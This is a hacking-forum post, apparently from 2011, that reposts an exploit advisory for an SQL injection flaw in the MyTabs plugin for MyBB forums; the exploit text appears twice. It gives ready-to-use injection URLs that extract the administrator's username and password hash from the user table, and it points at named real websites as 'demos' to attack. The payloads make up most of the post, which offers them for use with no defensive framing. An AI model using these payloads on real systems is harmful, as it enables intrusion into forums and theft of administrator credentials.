MyBB 0day \ MyTabs (plugin) SQL injection vulnerability 08-02-2011, 11:32 AM
#1
=====================================================================
MyBB 0day \ MyTabs (plugin) SQL injection vulnerability
=====================================================================
# Exploit title : MyBB 0day \ MyTabs (plugin) SQL injection vulnerability.
# Author: AutoRUN & dR.sqL
# Home : HackForums.AL , Autorun-Albania.COM , HackingWith.US , whiteh4t.com
# Date : 01 \ 08 \ 2011
# Tested on : Windows XP , Linux
# Category : web apps
# Software Link : http://mods.mybb.com/view/mytabs
# Google dork : Use your mind kid ^_^ !
Vulnerability :
$~ http://localhost/mybbpath/index.php?tab=[SQLi]
---------------------------------------
# ~ Expl0itation ~ #
---------------------------------------
$~ Get the administrator's username (usually it has uid=1) ~
http://localhost/mybbpath/index.php?tab=1' and(select 1 from(select count(*),concat((select username from mybb_users where uid=1),floor(Rand(0)*2))a from information_schema.tables group by a)b)-- -
$~ Get the administrator's password ~
http://localhost/mybbpath/index.php?tab=1' and(select 1 from(select count(*),concat((select password from mybb_users where uid=1),floor(Rand(0)*2))a from information_schema.tables group by a)b)-- -
---------------------------------------
# ~ Demos ~ #
---------------------------------------
http://secworm.net/forums/index.php?tab=1' (secworm - Ethical Hacking & IT security forum - ROFL !)
http://icanhazcookie.net/index.php?tab=1'
+++++++++++++++++++++++++++++++++++++++++++++++++++++
For More
http://1337day.com/exploits/16587
http://www.exploit-db.com/exploits/17595
MyBB 0day \ MyTabs (plugin) SQL injection vulnerability
=====================================================================
# Exploit title : MyBB 0day \ MyTabs (plugin) SQL injection vulnerability.
# Author: AutoRUN & dR.sqL
# Home : HackForums.AL , Autorun-Albania.COM , HackingWith.US , whiteh4t.com
# Date : 01 \ 08 \ 2011
# Tested on : Windows XP , Linux
# Category : web apps
# Software Link : http://mods.mybb.com/view/mytabs
# Google dork : Use your mind kid ^_^ !
Vulnerability :
$~ http://localhost/mybbpath/index.php?tab=[SQLi]
---------------------------------------
# ~ Expl0itation ~ #
---------------------------------------
$~ Get the administrator's username (usually it has uid=1) ~
http://localhost/mybbpath/index.php?tab=1' and(select 1 from(select count(*),concat((select username from mybb_users where uid=1),floor(Rand(0)*2))a from information_schema.tables group by a)b)-- -
$~ Get the administrator's password ~
http://localhost/mybbpath/index.php?tab=1' and(select 1 from(select count(*),concat((select password from mybb_users where uid=1),floor(Rand(0)*2))a from information_schema.tables group by a)b)-- -
---------------------------------------
# ~ Demos ~ #
---------------------------------------
http://secworm.net/forums/index.php?tab=1' (secworm - Ethical Hacking & IT security forum - ROFL !)
http://icanhazcookie.net/index.php?tab=1'
+++++++++++++++++++++++++++++++++++++++++++++++++++++
For More
http://1337day.com/exploits/16587
http://www.exploit-db.com/exploits/17595
![[Image: 728x90v.jpg]](http://img15.imageshack.us/img15/1865/728x90v.jpg)
![[+]](https://sinister.ly/images/modern/collapse_collapsed.png)
![[Image: Wfxdx.png]](http://i.imgur.com/Wfxdx.png)